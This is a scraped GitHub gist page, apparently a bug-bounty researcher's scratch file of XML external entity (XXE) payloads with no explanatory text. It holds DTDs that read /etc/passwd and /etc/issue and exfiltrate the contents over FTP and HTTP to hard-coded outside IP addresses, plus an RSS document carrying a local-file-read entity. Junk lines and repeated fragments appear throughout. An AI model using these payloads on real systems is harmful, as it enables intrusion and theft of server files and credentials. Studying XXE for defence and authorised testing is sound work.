Skip to content

Instantly share code, notes, and snippets.

View pranav1hivarekar's full-sized avatar

Pranav Hivarekar pranav1hivarekar

View GitHub Profile
@pranav1hivarekar
pranav1hivarekar / re
Created January 13, 2017 06:17
pbulci
asdfadsf
asdfasdf
asdfasdf
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "file:////Users/coolboss/Google Drive/BugBounty/confidential/POCs/xxe/xxe-example/test.txt">
<!ENTITY % dtd SYSTEM "https://gist.githubusercontent.com/pranav1hivarekar/41de45f2a16a99d9ec311bbc26e17887/raw/2322ab460a5bc32cf1a9dd1226758d9c0e293773/mynew.dtd">
%dtd;]>
file:///somefile.txt
file:///etc/environment
file:///etc/issue
@pranav1hivarekar
pranav1hivarekar / ftp.dtd
Last active May 6, 2018 05:01
oob ftp new
<!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://139.59.93.254:2121/%d;'>">
%c;
<!ENTITY % p2 "<!ENTITY e1 'pranav123%file;'>">
%p2;
<!ENTITY % file SYSTEM "file:///etc/issue">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://139.59.74.177/content?%file;'>">
%p2;
<!ENTITY % file SYSTEM "file:///etc/issue">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://159.89.168.89:90/pranav?%file;'>">
%p2;
<!ENTITY % b SYSTEM "file:///etc/issue">
<!ENTITY % c "<!ENTITY &#37; rrr SYSTEM 'http://159.89.168.89:90/pranav?%b;'>">
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>&xxe;</title>
<link>http://example.com/</link>
<description>A blog about things</description>
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
<item>